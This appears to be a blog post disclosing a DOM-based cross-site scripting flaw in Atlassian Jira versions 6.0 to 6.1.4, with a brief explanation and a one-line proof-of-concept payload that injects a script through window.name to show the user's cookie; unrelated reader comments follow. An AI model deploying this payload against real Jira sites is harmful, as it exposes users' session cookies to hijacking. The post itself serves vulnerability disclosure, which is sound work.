Atlassian Jira | DOM XSS Vulnerability | Unauthenticated

Atlassian Jira is a widely-used project management platform, offering robust tools for tracking, managing, and collaborating on various projects. Its features, including issue tracking and customizable workflows, make it a staple in software development and project management.

DOM XSS (Cross-Site Scripting) is a medium-critical vulnerability specific to web applications. This attack allows malicious scripts to be injected directly into a web page's Document Object Model (DOM), putting users at risk. Prompt identification and remediation of this vulnerability are essential to safeguarding a web application's integrity and security.

Proof of Concept

Tesla Motors | BugBounty

# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Blog: www.TinKode.com

Vulnerable code

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">


 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
Share on:


  1. Am o problema si suna cam asa :
    Acum cativa ani ani am creat un cont google , am uploadat o imagine cu mine , iar acum doresc sa o sterg.
    Cum pot sterge acea imagine daca nu mai am acces la cont ?

  2. Great post, I don't know much programming but this seems interesting.